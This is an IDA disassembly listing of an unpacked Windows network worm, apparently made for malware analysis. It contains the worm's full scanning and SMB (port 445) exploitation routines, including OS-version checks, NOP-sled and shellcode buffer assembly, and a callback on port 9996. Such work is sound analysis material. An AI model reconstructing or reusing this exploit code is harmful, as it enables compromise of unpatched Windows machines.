; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer,	std, 11/2007 |
; +-------------------------------------------------------------------------+
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer,	std, 11/2007 |
; +-------------------------------------------------------------------------+
; Input	MD5   :	AEB0A54C455675E4CB5A4748C2F74EF0

; File Name   :	u:\work\aeb0a54c455675e4cb5a4748c2f74ef0_unpacked.exe
; Format      :	Portable executable for	80386 (PE)
; Imagebase   :	400000
; Section 1. (virtual address 00001000)
; Virtual size			: 00008000 (  32768.)
; Section size in file		: 00008000 (  32768.)
; Offset to raw	data for section: 00001000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; OS type	  :  MS	Windows
; Application type:  Executable	32bit

		include	uni.inc	; see unicode subdir of	ida for	info on	unicode

		.model flat

; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
_text		segment	para public 'CODE' use32
		assume cs:_text
		;org 401000h
		assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing

; =============== S U B	R O U T	I N E =======================================

sub_401000	proc near		; CODE XREF: sub_40127D+7Cp
					; sub_401EF0:loc_401F35p ...
		mov	eax, dword_406F30
		imul	eax, 343FDh
		add	eax, 279EC3h
		mov	dword_406F30, eax
		shr	eax, 10h
		and	eax, 7FFFh
sub_401000	endp

; =============== S U B	R O U T	I N E =======================================

sub_40101E	proc near		; CODE XREF: WinMain(x,x,x,x)+1Fp

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_406F30, eax
sub_40101E	endp

; =============== S U B	R O U T	I N E =======================================

sub_401028	proc near		; CODE XREF: WinMain(x,x,x,x)+24p

var_190		= byte ptr -190h

		sub	esp, 190h
		lea	eax, [esp+190h+var_190]
		push	eax
		push	101h
		call	dword_405114	; WSAStartup
		add	esp, 190h
sub_401028	endp

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401045	proc near		; CODE XREF: sub_4010D2+4Cp

arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	esi
		push	edi
		push	[ebp+arg_0]
		call	dword_40510C	; inet_addr
		movsx	ecx, al
		mov	[ebp+arg_0], eax
		movsx	edx, byte ptr [ebp+arg_0+2]
		movsx	esi, byte ptr [ebp+arg_0+3]
		movsx	edi, ah
		test	ecx, ecx
		mov	eax, 100h
		jge	short loc_40106F
		add	ecx, eax

loc_40106F:				; CODE XREF: sub_401045+26j
		test	edi, edi
		jge	short loc_401075
		add	edi, eax

loc_401075:				; CODE XREF: sub_401045+2Cj
		test	edx, edx
		jge	short loc_40107B
		add	edx, eax

loc_40107B:				; CODE XREF: sub_401045+32j
		test	esi, esi
		jge	short loc_401081
		add	esi, eax

loc_401081:				; CODE XREF: sub_401045+38j
		push	1
		cmp	ecx, 7Fh
		pop	eax
		jnz	short loc_401095
		test	edi, edi
		jnz	short loc_4010CE
		test	edx, edx
		jnz	short loc_4010CE
		cmp	esi, eax
		jz	short loc_4010CC

loc_401095:				; CODE XREF: sub_401045+42j
		cmp	ecx, 0Ah
		jz	short loc_4010CC
		cmp	ecx, 0ACh
		jnz	short loc_4010AC
		cmp	edi, 0Fh
		jle	short loc_4010CE
		cmp	edi, 20h
		jl	short loc_4010CC

loc_4010AC:				; CODE XREF: sub_401045+5Bj
		cmp	ecx, 0C0h
		jnz	short loc_4010BC
		cmp	edi, 0A8h
		jz	short loc_4010CC

loc_4010BC:				; CODE XREF: sub_401045+6Dj
		cmp	ecx, 0A9h
		jnz	short loc_4010CE
		cmp	edi, 0FEh
		jnz	short loc_4010CE

loc_4010CC:				; CODE XREF: sub_401045+4Ej
					; sub_401045+53j ...
		xor	al, al

loc_4010CE:				; CODE XREF: sub_401045+46j
					; sub_401045+4Aj ...
		pop	edi
		pop	esi
		pop	ebp
sub_401045	endp

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_4010D2	proc near		; CODE XREF: sub_40127D+9Cp
					; sub_401EF0+1Ap

var_100		= byte ptr -100h
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 100h
		push	ebx
		push	esi
		push	edi
		lea	eax, [ebp+var_100]
		push	0FFh
		push	eax
		call	dword_405104	; gethostname
		test	eax, eax
		jnz	short loc_401136
		lea	eax, [ebp+var_100]
		push	eax
		call	dword_405110	; gethostbyname
		mov	edi, eax
		xor	esi, esi
		cmp	edi, esi
		jz	short loc_401136
		mov	eax, [edi+0Ch]
		cmp	[eax], esi
		jz	short loc_401136

loc_401110:				; CODE XREF: sub_4010D2+60j
		mov	eax, [esi+eax]
		push	dword ptr [eax]
		call	dword_405108	; inet_ntoa
		mov	ebx, eax
		push	ebx
		call	sub_401045
		test	al, al
		pop	ecx
		jnz	short loc_40113D
		mov	eax, [edi+0Ch]
		add	esi, 4
		cmp	dword ptr [esi+eax], 0
		jnz	short loc_401110
		jmp	short loc_401139
; ---------------------------------------------------------------------------

loc_401136:				; CODE XREF: sub_4010D2+20j
					; sub_4010D2+35j ...
		mov	ebx, [ebp+arg_0]

loc_401139:				; CODE XREF: sub_4010D2+62j
		test	ebx, ebx
		jz	short loc_401140

loc_40113D:				; CODE XREF: sub_4010D2+54j
		push	ebx
		jmp	short loc_401145
; ---------------------------------------------------------------------------

loc_401140:				; CODE XREF: sub_4010D2+69j
		push	offset a127_0_0_1 ; ""

loc_401145:				; CODE XREF: sub_4010D2+6Cj
		push	[ebp+arg_0]
		call	dword_405018	; lstrcpyA
		pop	edi
		pop	esi
		pop	ebx
sub_4010D2	endp

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401153	proc near		; CODE XREF: sub_401EF0+E2p

Dst		= word ptr -10h
var_E		= word ptr -0Eh
var_C		= dword	ptr -0Ch
var_8		= byte ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	esi
		push	10h		; Size
		lea	eax, [ebp+Dst]
		push	0		; Val
		push	eax		; Dst
		call	_memset
		add	esp, 0Ch
		mov	[ebp+Dst], 2
		push	1BDh
		call	dword_4050F4	; ntohs
		push	[ebp+arg_0]
		mov	[ebp+var_E], ax
		call	sub_4011D5
		mov	[ebp+var_C], eax
		push	8		; Size
		lea	eax, [ebp+var_8]
		push	0		; Val
		push	eax		; Dst
		call	_memset
		add	esp, 10h
		push	6
		push	1
		pop	ebx
		push	ebx
		push	2
		call	dword_4050F8	; socket
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		jnz	short loc_4011B4
		xor	al, al
		jmp	short loc_4011D1
; ---------------------------------------------------------------------------

loc_4011B4:				; CODE XREF: sub_401153+5Bj
		lea	eax, [ebp+Dst]
		push	10h
		push	eax
		push	esi
		call	dword_4050FC	; connect
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_4011C8
		xor	bl, bl

loc_4011C8:				; CODE XREF: sub_401153+71j
		push	esi
		call	dword_40511C	; closesocket
		mov	al, bl

loc_4011D1:				; CODE XREF: sub_401153+5Fj
		pop	esi
		pop	ebx
sub_401153	endp

; =============== S U B	R O U T	I N E =======================================

sub_4011D5	proc near		; CODE XREF: sub_401153+30p
					; sub_40127D+34p ...

arg_0		= dword	ptr  4

		push	esi
		push	edi
		mov	edi, [esp+8+arg_0]
		push	edi
		call	dword_40510C	; inet_addr
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		jz	short loc_4011F2
		test	esi, esi
		jnz	short loc_401204
		cmp	byte ptr [edi],	30h
		jz	short loc_40120B

loc_4011F2:				; CODE XREF: sub_4011D5+12j
		push	edi
		call	dword_405110	; gethostbyname
		test	eax, eax
		jz	short loc_401204
		mov	eax, [eax+0Ch]
		mov	eax, [eax]
		mov	esi, [eax]

loc_401204:				; CODE XREF: sub_4011D5+16j
					; sub_4011D5+26j
		cmp	esi, 0FFFFFFFFh
		jnz	short loc_40120B
		xor	esi, esi

loc_40120B:				; CODE XREF: sub_4011D5+1Bj
					; sub_4011D5+32j
		mov	eax, esi
		pop	edi
		pop	esi
sub_4011D5	endp

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401210	proc near		; CODE XREF: sub_40127D+F9p

Str		= byte ptr -14h
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		inc	dword_406F34
		push	edi
		push	dword_406F34
		lea	eax, [ebp+Str]
		push	offset aI	; "%i"
		push	eax
		call	dword_4050E0	; wsprintfA
		add	esp, 0Ch
		push	0
		push	offset aCWin2_log ; "c:\\win2.log"
		call	dword_405024	; _lcreat
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jz	short loc_40127A
		lea	eax, [ebp+Str]
		push	esi
		push	eax		; Str
		call	_strlen
		mov	esi, dword_405020
		pop	ecx
		push	eax
		lea	eax, [ebp+Str]
		push	eax
		push	edi
		call	esi ; dword_405020
		push	[ebp+arg_0]	; Str
		call	_strlen
		pop	ecx
		push	eax
		push	[ebp+arg_0]
		push	edi
		call	esi ; dword_405020
		push	edi
		call	dword_40501C	; _lclose
		pop	esi

loc_40127A:				; CODE XREF: sub_401210+37j
		pop	edi
sub_401210	endp

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_40127D	proc near		; CODE XREF: sub_401A84+7Bp

var_348		= dword	ptr -348h
Str		= byte ptr -33Ch
var_110		= byte ptr -110h
Dst		= word ptr -10h
var_E		= word ptr -0Eh
var_C		= dword	ptr -0Ch
var_8		= byte ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 33Ch
		push	ebx
		push	edi
		xor	ebx, ebx
		push	10h		; Size
		lea	eax, [ebp+Dst]
		push	ebx		; Val
		push	eax		; Dst
		call	_memset
		add	esp, 0Ch
		mov	[ebp+Dst], 2
		push	270Ch
		call	dword_4050F4	; ntohs
		push	[ebp+arg_0]
		mov	[ebp+var_E], ax
		call	sub_4011D5
		mov	[ebp+var_C], eax
		push	8		; Size
		lea	eax, [ebp+var_8]
		push	ebx		; Val
		push	eax		; Dst
		call	_memset
		add	esp, 10h
		push	6
		push	1
		push	2
		call	dword_4050F8	; socket
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_4012E2
		xor	al, al
		jmp	loc_401394
; ---------------------------------------------------------------------------

loc_4012E2:				; CODE XREF: sub_40127D+5Cj
		lea	eax, [ebp+Dst]
		push	10h
		push	eax
		push	edi
		call	dword_4050FC	; connect
		cmp	eax, 0FFFFFFFFh
		jz	loc_40138B
		push	esi
		call	sub_401000
		mov	esi, eax
		lea	eax, [ebp+var_110]
		push	offset Source
		push	eax
		call	dword_405018	; lstrcpyA
		lea	eax, [ebp+var_110]
		push	eax
		call	sub_4010D2
		push	esi
		lea	eax, [ebp+var_110]
		push	esi
		push	eax
		push	off_406030
		lea	eax, [ebp+Str]
		push	eax
		call	dword_4050E0	; wsprintfA
		lea	eax, [ebp+Str]
		xor	esi, esi
		push	eax		; Str
		call	_strlen
		add	esp, 1Ch
		test	eax, eax
		jbe	short loc_401373

loc_40134F:				; CODE XREF: sub_40127D+F4j
		push	ebx
		lea	eax, [ebp+esi+Str]
		push	1
		push	eax
		push	edi
		call	dword_4050F0	; send
		lea	eax, [ebp+Str]
		inc	esi
		push	eax		; Str
		call	_strlen
		cmp	esi, eax
		pop	ecx
		jb	short loc_40134F

loc_401373:				; CODE XREF: sub_40127D+D0j
		push	[ebp+arg_0]
		call	sub_401210
		mov	[esp+348h+var_348], 3E8h
		call	dword_405028	; Sleep
		mov	bl, 1
		pop	esi

loc_40138B:				; CODE XREF: sub_40127D+75j
		push	edi
		call	dword_40511C	; closesocket
		mov	al, bl

loc_401394:				; CODE XREF: sub_40127D+60j
		pop	edi
		pop	ebx
sub_40127D	endp

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401398	proc near		; CODE XREF: sub_401A84+15p

var_744		= byte ptr -744h
var_714		= byte ptr -714h
Src		= byte ptr -104h
var_103		= byte ptr -103h
var_B4		= byte ptr -0B4h
var_B1		= byte ptr -0B1h
var_87		= byte ptr -87h
var_85		= byte ptr -85h
var_84		= byte ptr -84h
Str		= byte ptr -3Ch
var_14		= word ptr -14h
var_12		= word ptr -12h
var_10		= dword	ptr -10h
Dst		= byte ptr -0Ch
var_2		= byte ptr -2
var_1		= byte ptr -1
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 744h
		push	ebx
		push	esi
		push	edi
		push	offset Source
		push	[ebp+arg_4]
		call	dword_405018	; lstrcpyA
		push	[ebp+arg_0]
		lea	eax, [ebp+Str]
		push	offset aSIpc	; "\\\\%s\\ipc$"
		push	eax
		call	dword_4050E0	; wsprintfA
		add	esp, 0Ch
		xor	edi, edi
		xor	ecx, ecx
		lea	eax, [ebp+var_103]

loc_4013D1:				; CODE XREF: sub_401398+49j
		mov	dl, [ebp+ecx+Str]
		mov	[eax-1], dl
		and	byte ptr [eax],	0
		inc	ecx
		inc	eax
		inc	eax
		cmp	ecx, 28h
		jl	short loc_4013D1
		push	60h		; Size
		lea	eax, [ebp+var_B4]
		push	offset dword_4063E4 ; Src
		push	eax		; Dst
		call	_memcpy
		lea	eax, [ebp+Str]
		push	eax		; Str
		call	_strlen
		shl	eax, 1
		push	eax		; Size
		lea	eax, [ebp+Src]
		push	eax		; Src
		lea	eax, [ebp+var_84]
		push	eax		; Dst
		call	_memcpy
		add	esp, 1Ch
		lea	eax, [ebp+Str]
		push	9		; Size
		push	(offset	aC+3)	; Src
		push	eax		; Str
		call	_strlen
		pop	ecx
		lea	eax, [ebp+eax*2+var_85]
		push	eax		; Dst
		call	_memcpy
		lea	eax, [ebp+Str]
		push	eax		; Str
		call	_strlen
		add	al, 1Ah
		push	1		; Size
		shl	al, 1
		mov	[ebp+var_2], al
		lea	eax, [ebp+var_2]
		push	eax		; Src
		lea	eax, [ebp+var_B1]
		push	eax		; Dst
		call	_memcpy
		lea	eax, [ebp+Str]
		push	eax		; Str
		call	_strlen
		shl	al, 1
		add	al, 9
		push	1		; Size
		mov	[ebp+var_1], al
		lea	eax, [ebp+var_1]
		push	eax		; Src
		lea	eax, [ebp+var_87]
		push	eax		; Dst
		call	_memcpy
		add	esp, 2Ch
		push	[ebp+arg_0]
		call	dword_405110	; gethostbyname
		mov	ebx, eax
		cmp	ebx, edi
		jz	loc_401554
		push	edi
		push	1
		push	2

loc_401495:				; DATA XREF: .text:off_4065D8o
		call	dword_4050F8	; socket
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		mov	[ebp+arg_0], esi
		jz	loc_401554
		push	1BDh
		mov	[ebp+var_14], 2
		call	dword_4050F4	; ntohs
		mov	[ebp+var_12], ax
		mov	eax, [ebx+0Ch]
		push	8		; Size
		push	edi		; Val
		mov	eax, [eax]
		mov	eax, [eax]
		mov	[ebp+var_10], eax
		lea	eax, [ebp+Dst]
		push	eax		; Dst
		call	_memset
		add	esp, 0Ch
		lea	eax, [ebp+var_14]
		push	10h
		push	eax
		push	esi
		call	dword_4050FC	; connect
		cmp	eax, 0FFFFFFFFh
		jz	short loc_401554
		mov	ebx, dword_4050F0
		push	edi
		push	89h
		push	offset dword_4061CC
		push	esi
		call	ebx ; dword_4050F0
		cmp	eax, 0FFFFFFFFh
		jz	short loc_401554
		push	edi
		mov	edi, 640h
		lea	eax, [ebp+var_744]
		push	edi
		push	eax
		push	esi
		mov	esi, dword_4050EC
		call	esi ; dword_4050EC
		push	0
		push	0A8h
		push	offset dword_406258
		push	[ebp+arg_0]
		call	ebx ; dword_4050F0
		cmp	eax, 0FFFFFFFFh
		jz	short loc_401554
		push	0
		lea	eax, [ebp+var_744]
		push	edi
		push	eax
		push	[ebp+arg_0]
		call	esi ; dword_4050EC
		push	0
		push	0DEh
		push	offset dword_406304
		push	[ebp+arg_0]
		call	ebx ; dword_4050F0
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_401558

loc_401554:				; CODE XREF: sub_401398+F2j
					; sub_401398+10Bj ...
		xor	eax, eax
		jmp	short loc_401599
; ---------------------------------------------------------------------------

loc_401558:				; CODE XREF: sub_401398+1BAj
		push	0
		lea	eax, [ebp+var_744]
		push	edi
		push	eax
		push	[ebp+arg_0]
		call	esi ; dword_4050EC
		push	46h
		lea	esi, [ebp+var_714]
		pop	edi

loc_401570:				; CODE XREF: sub_401398+1F3j
		movsx	eax, byte ptr [esi]
		push	eax
		push	[ebp+arg_4]
		push	offset aSC	; "%s%c"
		push	[ebp+arg_4]
		call	dword_4050E0	; wsprintfA
		add	esp, 10h
		inc	esi
		inc	esi
		dec	edi
		jnz	short loc_401570
		push	[ebp+arg_0]
		call	dword_40511C	; closesocket
		push	1
		pop	eax

loc_401599:				; CODE XREF: sub_401398+1BEj
		pop	edi
		pop	esi
		pop	ebx
sub_401398	endp

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_40159E	proc near		; CODE XREF: sub_401A84+3Bp
					; sub_401A84+5Ep ...

var_89C4	= byte ptr -89C4h
var_895C	= byte ptr -895Ch
var_68EC	= byte ptr -68ECh
var_687C	= byte ptr -687Ch
var_5DB8	= byte ptr -5DB8h
var_4814	= byte ptr -4814h
var_4813	= byte ptr -4813h
var_3780	= byte ptr -3780h
var_2CBC	= byte ptr -2CBCh
var_2CBB	= byte ptr -2CBBh
var_2CB8	= byte ptr -2CB8h
var_24D4	= byte ptr -24D4h
var_24C4	= byte ptr -24C4h
var_21A0	= byte ptr -21A0h
var_219C	= byte ptr -219Ch
var_2190	= byte ptr -2190h
var_1F08	= byte ptr -1F08h
var_1E8C	= byte ptr -1E8Ch
var_16BC	= byte ptr -16BCh
var_1211	= byte ptr -1211h
var_F24		= byte ptr -0F24h
var_E84		= byte ptr -0E84h
var_778		= dword	ptr -778h
var_768		= byte ptr -768h
var_754		= byte ptr -754h
Src		= byte ptr -114h
var_113		= byte ptr -113h
Dst		= byte ptr -0C4h
var_C1		= byte ptr -0C1h
var_97		= byte ptr -97h
var_95		= byte ptr -95h
var_94		= byte ptr -94h
Str		= byte ptr -4Ch
var_24		= word ptr -24h
var_22		= word ptr -22h
var_20		= dword	ptr -20h
var_1C		= byte ptr -1Ch
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_6		= byte ptr -6
var_5		= byte ptr -5
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		mov	eax, 89C4h
		call	__alloca_probe
		mov	eax, dword_406A34
		push	[ebp+arg_0]
		mov	[ebp+var_14], eax
		mov	eax, dword_406A38
		mov	[ebp+var_10], eax
		lea	eax, [ebp+Str]
		push	offset aSIpc	; "\\\\%s\\ipc$"
		push	eax
		call	dword_4050E0	; wsprintfA
		add	esp, 0Ch
		xor	ecx, ecx
		lea	eax, [ebp+var_113]

loc_4015D8:				; CODE XREF: sub_40159E+4Aj
		mov	dl, [ebp+ecx+Str]
		mov	[eax-1], dl
		and	byte ptr [eax],	0
		inc	ecx
		inc	eax
		inc	eax
		cmp	ecx, 28h
		jl	short loc_4015D8
		push	ebx
		push	esi
		push	edi
		push	60h		; Size
		lea	eax, [ebp+Dst]
		push	offset dword_4063E4 ; Src
		push	eax		; Dst
		call	_memcpy
		lea	eax, [ebp+Str]
		push	eax		; Str
		call	_strlen
		shl	eax, 1
		push	eax		; Size
		lea	eax, [ebp+Src]
		push	eax		; Src
		lea	eax, [ebp+var_94]
		push	eax		; Dst
		call	_memcpy
		add	esp, 1Ch
		lea	eax, [ebp+Str]
		push	9		; Size
		push	(offset	aC+3)	; Src
		push	eax		; Str
		call	_strlen
		pop	ecx
		lea	eax, [ebp+eax*2+var_95]
		push	eax		; Dst
		call	_memcpy
		lea	eax, [ebp+Str]
		push	eax		; Str
		call	_strlen
		add	al, 1Ah
		push	1		; Size
		shl	al, 1
		mov	[ebp+var_5], al
		lea	eax, [ebp+var_5]
		push	eax		; Src
		lea	eax, [ebp+var_C1]
		push	eax		; Dst
		call	_memcpy
		lea	eax, [ebp+Str]
		push	eax		; Str
		call	_strlen
		shl	al, 1
		add	al, 9
		push	1		; Size
		mov	[ebp+var_6], al
		lea	eax, [ebp+var_6]
		push	eax		; Src
		lea	eax, [ebp+var_97]
		push	eax		; Dst
		call	_memcpy
		add	esp, 2Ch
		push	270Ch
		call	dword_4050F4	; ntohs
		xor	eax, 9999h
		push	2		; Size
		mov	[ebp+var_C], eax
		lea	eax, [ebp+var_C]
		push	eax		; Src
		push	offset dword_4060E4 ; Dst
		call	_memcpy
		mov	ebx, [ebp+arg_4]
		add	esp, 0Ch
		cmp	ebx, 1
		jz	short loc_40171A
		cmp	ebx, 2
		jz	short loc_40171A
		push	7D0h		; Size
		lea	eax, [ebp+var_F24]
		push	90h		; Val
		push	eax		; Dst
		call	_memset
		mov	esi, offset Str	; "ë"
		push	esi		; Str
		call	_strlen
		push	eax		; Size
		lea	eax, [ebp+var_E84]
		push	esi		; Src
		push	eax		; Dst
		call	_memcpy
		lea	eax, [ebp+var_14]
		push	eax		; Str
		call	_strlen
		push	eax		; Size
		lea	eax, [ebp+var_14]
		push	eax		; Src
		lea	eax, [ebp+var_768]
		push	eax		; Dst
		call	_memcpy
		add	esp, 2Ch
		imul	ebx, 3Ch
		mov	eax, dword_406810[ebx]
		mov	[ebp+var_778], eax
		jmp	loc_4017EE
; ---------------------------------------------------------------------------

loc_40171A:				; CODE XREF: sub_40159E+115j
					; sub_40159E+11Aj
		mov	edi, 0DACh
		lea	eax, [ebp+var_2CB8]
		push	edi		; Size
		push	90h		; Val
		push	eax		; Dst
		call	_memset
		imul	ebx, 3Ch
		push	4		; Size
		lea	eax, [ebp+var_24D4]
		lea	ebx, dword_406810[ebx]
		push	ebx		; Src
		push	eax		; Dst
		call	_memcpy
		mov	esi, offset Str	; "ë"
		push	esi		; Str
		call	_strlen
		push	eax		; Size
		lea	eax, [ebp+var_24C4]
		push	esi		; Src
		push	eax		; Dst
		call	_memcpy
		push	4		; Size
		lea	eax, [ebp+var_21A0]
		push	offset dword_406A2C ; Src
		push	eax		; Dst
		call	_memcpy
		push	4		; Size
		lea	eax, [ebp+var_219C]
		push	ebx		; Src
		push	eax		; Dst
		call	_memcpy
		add	esp, 40h
		push	esi		; Str
		call	_strlen
		push	eax		; Size
		lea	eax, [ebp+var_2190]
		push	esi		; Src
		push	eax		; Dst
		call	_memcpy
		add	esp, 10h
		xor	ecx, ecx
		lea	eax, [ebp+var_4813]

loc_4017A6:				; CODE XREF: sub_40159E+21Aj
		mov	dl, [ebp+ecx+var_2CB8]
		mov	[eax-1], dl
		and	byte ptr [eax],	0
		inc	ecx
		inc	eax
		inc	eax
		cmp	ecx, edi
		jl	short loc_4017A6
		and	[ebp+var_2CBC],	0
		and	[ebp+var_2CBB],	0
		mov	esi, 1C52h
		lea	eax, [ebp+var_89C4]
		push	esi		; Size
		push	31h		; Val
		push	eax		; Dst
		call	_memset
		push	esi		; Size
		lea	eax, [ebp+var_68EC]
		push	31h		; Val
		push	eax		; Dst
		call	_memset
		add	esp, 18h

loc_4017EE:				; CODE XREF: sub_40159E+177j
		push	0
		push	1
		push	2
		call	dword_4050F8	; socket
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		mov	[ebp+var_4], edi
		jz	loc_401A7D
		push	1BDh
		mov	[ebp+var_24], 2
		call	dword_4050F4	; ntohs
		push	[ebp+arg_0]
		mov	[ebp+var_22], ax
		call	sub_4011D5
		mov	[ebp+var_20], eax
		xor	ebx, ebx
		push	8		; Size
		lea	eax, [ebp+var_1C]
		push	ebx		; Val
		push	eax		; Dst
		call	_memset
		add	esp, 10h
		lea	eax, [ebp+var_24]
		push	10h
		push	eax
		push	edi
		call	dword_4050FC	; connect
		cmp	eax, 0FFFFFFFFh
		jz	loc_401A7D
		mov	esi, dword_4050F0
		push	ebx
		push	89h
		push	offset dword_4061CC
		push	edi
		call	esi ; dword_4050F0
		cmp	eax, 0FFFFFFFFh
		jz	loc_401A7D
		push	ebx
		mov	ebx, 640h
		lea	eax, [ebp+var_754]
		push	ebx
		push	eax
		push	edi
		mov	edi, dword_4050EC
		call	edi ; dword_4050EC
		push	0
		push	0A8h
		push	offset dword_406258
		push	[ebp+var_4]
		call	esi ; dword_4050F0
		cmp	eax, 0FFFFFFFFh
		jz	loc_401A7D
		push	0
		lea	eax, [ebp+var_754]
		push	ebx
		push	eax
		push	[ebp+var_4]
		call	edi ; dword_4050EC
		push	0
		push	0DEh
		push	offset dword_406304
		push	[ebp+var_4]
		call	esi ; dword_4050F0
		cmp	eax, 0FFFFFFFFh
		jz	loc_401A7D
		push	0
		lea	eax, [ebp+var_754]
		push	ebx
		push	eax
		push	[ebp+var_4]
		call	edi ; dword_4050EC
		movsx	eax, [ebp+var_5]
		add	eax, 4
		push	0
		push	eax
		lea	eax, [ebp+Dst]
		push	eax
		push	[ebp+var_4]
		call	esi ; dword_4050F0
		cmp	eax, 0FFFFFFFFh
		jz	loc_401A7D
		push	0
		lea	eax, [ebp+var_754]
		push	ebx
		push	eax
		push	[ebp+var_4]
		call	edi ; dword_4050EC
		push	0
		push	68h
		push	offset dword_406448
		push	[ebp+var_4]
		call	esi ; dword_4050F0
		cmp	eax, 0FFFFFFFFh
		jz	loc_401A7D
		push	0
		lea	eax, [ebp+var_754]
		push	ebx
		push	eax
		push	[ebp+var_4]
		call	edi ; dword_4050EC
		push	0
		push	0A0h
		push	offset dword_4064B4
		push	[ebp+var_4]
		call	esi ; dword_4050F0
		cmp	eax, 0FFFFFFFFh
		jz	loc_401A7D
		push	0
		lea	eax, [ebp+var_754]
		push	ebx
		push	eax
		push	[ebp+var_4]
		call	edi ; dword_4050EC
		cmp	[ebp+arg_4], 1
		jz	short loc_4019BB
		cmp	[ebp+arg_4], 2
		jz	short loc_4019BB
		push	7Ch		; Size
		lea	eax, [ebp+var_1F08]
		push	offset dword_406558 ; Src
		push	eax		; Dst
		call	_memcpy
		lea	eax, [ebp+var_F24]
		push	7D0h		; Size
		push	eax		; Src
		lea	eax, [ebp+var_1E8C]
		push	eax		; Dst
		call	_memcpy
		push	90h		; Size
		lea	eax, [ebp+var_16BC]
		push	offset off_4065D8 ; Src
		push	eax		; Dst
		call	_memcpy
		add	esp, 24h
		and	[ebp+var_1211],	0
		lea	eax, [ebp+var_1F08]
		push	0
		push	0CF8h
		jmp	loc_401A5E
; ---------------------------------------------------------------------------

loc_4019BB:				; CODE XREF: sub_40159E+3B8j
					; sub_40159E+3BEj
		push	68h		; Size
		lea	eax, [ebp+var_89C4]
		push	offset dword_40666C ; Src
		push	eax		; Dst
		call	_memcpy
		lea	eax, [ebp+var_4814]
		push	1B5Ah		; Size
		push	eax		; Src
		lea	eax, [ebp+var_895C]
		push	eax		; Dst
		call	_memcpy
		push	70h		; Size
		lea	eax, [ebp+var_68EC]
		push	offset dword_4066D8 ; Src
		push	eax		; Dst
		call	_memcpy
		lea	eax, [ebp+var_3780]
		push	0A5Eh		; Size
		push	eax		; Src
		lea	eax, [ebp+var_687C]
		push	eax		; Dst
		call	_memcpy
		push	84h		; Size
		lea	eax, [ebp+var_5DB8]
		push	offset dword_40674C ; Src
		push	eax		; Dst
		call	_memcpy
		add	esp, 3Ch
		lea	eax, [ebp+var_89C4]
		push	0
		push	10FCh
		push	eax
		push	[ebp+var_4]
		call	esi ; dword_4050F0
		cmp	eax, 0FFFFFFFFh
		jz	short loc_401A7D
		push	0
		lea	eax, [ebp+var_754]
		push	ebx
		push	eax
		push	[ebp+var_4]
		call	edi ; dword_4050EC
		push	0
		push	0FDCh
		lea	eax, [ebp+var_68EC]

loc_401A5E:				; CODE XREF: sub_40159E+418j
		push	eax
		push	[ebp+var_4]
		call	esi ; dword_4050F0
		cmp	eax, 0FFFFFFFFh
		jz	short loc_401A7D
		push	3E8h
		call	dword_405028	; Sleep
		push	[ebp+var_4]
		call	dword_40511C	; closesocket

loc_401A7D:				; CODE XREF: sub_40159E+264j
					; sub_40159E+2ABj ...
		pop	edi
		pop	esi
		xor	eax, eax
		pop	ebx
sub_40159E	endp

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401A84	proc near		; CODE XREF: WinMain(x,x,x,x)+3Ap

Str		= byte ptr -84h
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 84h
		push	esi
		mov	esi, [ebp+arg_0]
		lea	eax, [ebp+Str]
		push	eax
		push	esi
		call	sub_401398
		pop	ecx
		cmp	eax, 1
		pop	ecx
		jnz	short loc_401B05
		lea	eax, [ebp+Str]
		push	offset SubStr	; "5.1"
		push	eax		; Str
		call	_strstr
		pop	ecx
		test	eax, eax
		pop	ecx
		jz	short loc_401AC8
		push	0
		push	esi
		call	sub_40159E
		push	0
		jmp	short loc_401AF5
; ---------------------------------------------------------------------------

loc_401AC8:				; CODE XREF: sub_401A84+36j
		lea	eax, [ebp+Str]
		push	offset a5_0	; "5.0"
		push	eax		; Str
		call	_strstr
		pop	ecx
		test	eax, eax
		pop	ecx
		jz	short loc_401AEB
		push	1
		push	esi
		call	sub_40159E
		push	1
		jmp	short loc_401AF5
; ---------------------------------------------------------------------------

loc_401AEB:				; CODE XREF: sub_401A84+59j
		push	2
		push	esi
		call	sub_40159E
		push	2

